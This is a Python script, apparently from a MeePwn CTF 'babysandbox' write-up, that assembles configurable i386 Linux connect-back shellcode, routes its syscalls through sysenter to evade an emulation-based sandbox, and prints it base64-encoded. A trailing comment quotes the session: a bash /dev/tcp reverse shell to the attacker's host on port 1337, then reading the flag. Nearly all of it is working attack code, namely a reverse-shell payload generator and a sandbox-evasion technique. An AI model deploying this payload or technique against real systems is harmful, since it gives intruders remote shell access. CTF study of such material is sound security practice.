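#!/usr/bin/env python
"""Generate an i386 Linux connect-back shellcode that issues every syscall
through ``sysenter`` (not ``int 0x80``) and print it base64-encoded.

What the payload does, in Linux i386 ABI terms:

1. ``socketcall(SYS_SOCKET, [AF_INET, SOCK_STREAM, 0])``  -> fd
2. ``socketcall(SYS_CONNECT, [fd, &sockaddr_in(host, port), 16])``
3. ``dup2(fd, 0)``, ``dup2(fd, 1)``, ``dup2(fd, 2)``
4. ``execve("/bin/sh", ["/bin/sh", NULL], NULL)``
5. ``exit(-1)`` if execve ever returns

Usage: ``python gen.py [HOST [PORT]]``.  Defaults are 127.0.0.1:39321, the
values that were hard-coded in the original payload, so a bare run emits the
same bytes as before (apart from the repaired exit path, see the template).

The transcript at the bottom (flag text mentions Unicorn) suggests the
sandbox vetted shellcode by emulating it; presumably ``sysenter`` is handled
differently from ``int 0x80`` under emulation and that is what the bypass
relies on -- confirm against the challenge binary before reusing the idea.
Every syscall is routed through the ``_sysenter`` stub, which mimics the vDSO
``__kernel_vsyscall`` prologue; see the comment on it for the assumptions.
"""
import socket
import struct
import sys
from base64 import b64encode

AF_INET = 2        # sin_family / socket() domain
DEFAULT_HOST = '127.0.0.1'
DEFAULT_PORT = 39321   # 0x9999, as in the original `push 0x99990002`

# Two %08x slots: sin_addr dword, then (sin_port big-endian) << 16 | AF_INET.
# Comments are C-style because pwntools runs the source through cpp, which
# strips them; `#` comments would be taken for preprocessor directives.
SHELLCODE_TEMPLATE = '''
    /* --- socket(AF_INET, SOCK_STREAM, 0) via socketcall(SYS_SOCKET, args) --- */
    push 0x66                 /* eax = __NR_socketcall */
    pop eax
    push ebx                  /* protocol: relies on ebx == 0 at entry -- TODO confirm on target */
    inc ebx                   /* ebx = 1, doubles as SYS_SOCKET for the call below */
    push ebx                  /* SOCK_STREAM */
    push 0x2                  /* AF_INET; stack now holds args = [2, 1, 0] */
    mov ecx, esp
    call _sysenter            /* eax = new socket fd */

    /* --- connect(fd, &addr, 16) via socketcall(SYS_CONNECT, args) --- */
    xor ecx, ecx
    xchg ebx, eax             /* ebx = fd, eax = 1 */
    mov al, 0x66              /* eax = __NR_socketcall (upper bytes already 0) */
    push 0x%08x               /* sin_addr, IPv4 address as a little-endian dword */
    push 0x%08x               /* sin_port (network order) << 16 | AF_INET */
    mov ecx, esp              /* ecx = &sockaddr_in (sin_zero is never read for AF_INET) */
    push 0x10                 /* addrlen = sizeof(struct sockaddr_in) */
    push ecx
    push ebx                  /* args = [fd, &addr, 16] */
    mov bl, 0x3               /* SYS_CONNECT -- NOTE: also clobbers the fd's low byte */
    mov ecx, esp
    call _sysenter

    /* --- dup2(fd, 0 / 1 / 2) ---
       ebx is 3 here (from `mov bl, 0x3`), so this only works when socket()
       returned fd 3, i.e. when only 0-2 were open.  A payload that must survive
       extra open descriptors would have to save the real fd before connect. */
    mov al, 0x3f              /* __NR_dup2; eax was 0 after a successful connect */
    xor ecx, ecx              /* newfd = stdin */
    call _sysenter
    mov al, 0x3f
    inc ecx                   /* stdout */
    call _sysenter
    mov al, 0x3f
    inc ecx                   /* stderr */
    call _sysenter

    /* --- execve("/bin/sh", ["/bin/sh", NULL], NULL) --- */
    push edx                  /* padding only; "/sh\\0" below already NUL-terminates */
    push 0x68732f             /* "/sh\\0" */
    push 0x6e69622f           /* "/bin" */
    mov ebx, esp              /* ebx = "/bin/sh" */
    xor edx, edx              /* envp = NULL */
    push edx
    push ebx
    mov ecx, esp              /* argv = ["/bin/sh", NULL] */
    mov al, 0x0b              /* __NR_execve; eax was 2 after the last dup2 */
    call _sysenter

    /* --- exit(-1) if execve returned ---
       execve only returns on failure with eax = -1, so the original
       `mov al, 0x1` produced 0xffffff01, not __NR_exit.  Load eax in full. */
    push 0x1                  /* __NR_exit */
    pop eax
    or ebx, -1                /* status = -1 (255 after masking) */
    /* no call: fall straight into the stub, exit never returns */

    /* Replica of the vDSO __kernel_vsyscall prologue.  After sysenter the
       kernel returns to the vDSO's fixed landing pad, which does
       `pop ebp; pop edx; pop ecx; ret`, so the stack must be laid out exactly
       like this for that `ret` to reach the address pushed by our `call`.
       Assumes a kernel that takes the sysenter path with the vDSO mapped --
       evidently true on the challenge box, per the transcript below. */
_sysenter:
    push ecx
    push edx
    push ebp
    mov ebp, esp
    sysenter
'''


def sockaddr_words(host, port):
    """Return the two dwords the payload ``push``es to build a ``sockaddr_in``.

    Pushing ``addr_dword`` and then ``family_port`` leaves ``esp`` pointing at
    the bytes ``02 00 <port BE> <addr>``, i.e. a correctly laid out 8-byte
    prefix of the structure.

    Args:
        host: dotted-quad IPv4 address of the listener.
        port: TCP port of the listener, in host byte order.

    Returns:
        ``(addr_dword, family_port)`` as Python ints suitable for ``%08x``.

    Raises:
        OSError / socket.error: ``host`` is not a valid dotted quad.
        struct.error: ``port`` is outside 0..65535.
    """
    addr_dword = struct.unpack('<I', socket.inet_aton(host))[0]
    # Memory order is: family as a little-endian short, then the port as
    # a big-endian short; read that back as one little-endian dword.
    family_port = struct.unpack(
        '<I', struct.pack('<H', AF_INET) + struct.pack('>H', port))[0]
    return addr_dword, family_port


def build_shellcode(host=DEFAULT_HOST, port=DEFAULT_PORT):
    """Assemble the connect-back payload for ``host``:``port``; return raw bytes.

    The address and port are embedded verbatim, so any zero byte in them ends
    up in the payload (127.0.0.1 already contributes two); the payload was
    never NUL-free and the `call` to the stub is relative, so it stays
    position-independent.
    """
    # pwntools is only needed for assembling, so import it lazily; the
    # sockaddr helper and argument handling stay usable without it.
    from pwn import asm, context
    context.arch = 'i386'
    addr_dword, family_port = sockaddr_words(host, port)
    return asm(SHELLCODE_TEMPLATE % (addr_dword, family_port))


def main(argv):
    """Print the base64 payload; ``argv[1]`` / ``argv[2]`` override host / port."""
    host = argv[1] if len(argv) > 1 else DEFAULT_HOST
    port = int(argv[2]) if len(argv) > 2 else DEFAULT_PORT
    # .decode() keeps the output a plain text line on both Python 2 and 3.
    print(b64encode(build_shellcode(host, port)).decode('ascii'))


if __name__ == '__main__':
    main(sys.argv)


# Session transcript from the original writeup, kept verbatim.  The payload
# dup2()s the socket over stdin/stdout/stderr before exec'ing /bin/sh, so the
# shell reads its commands from the 39321 listener, which feeds it a second,
# bash-based reverse shell towards the attacker's box on port 1337:
#
#   $ echo "bash -c 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1337 0>&1'" | ./ncat.exe -lvnp 39321
#   $ ./ncat -lvnp 1337
#   bash: cannot set terminal process group (12270): Inappropriate ioctl for device
#   bash: no job control in this shell
#   babysandbox@20283cd3903b:/$ id
#   id
#   uid=1000(babysandbox) gid=1000(babysandbox) groups=1000(babysandbox)
#   babysandbox@20283cd3903b:/$ cat /flag
#   cat /flag
#   MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect}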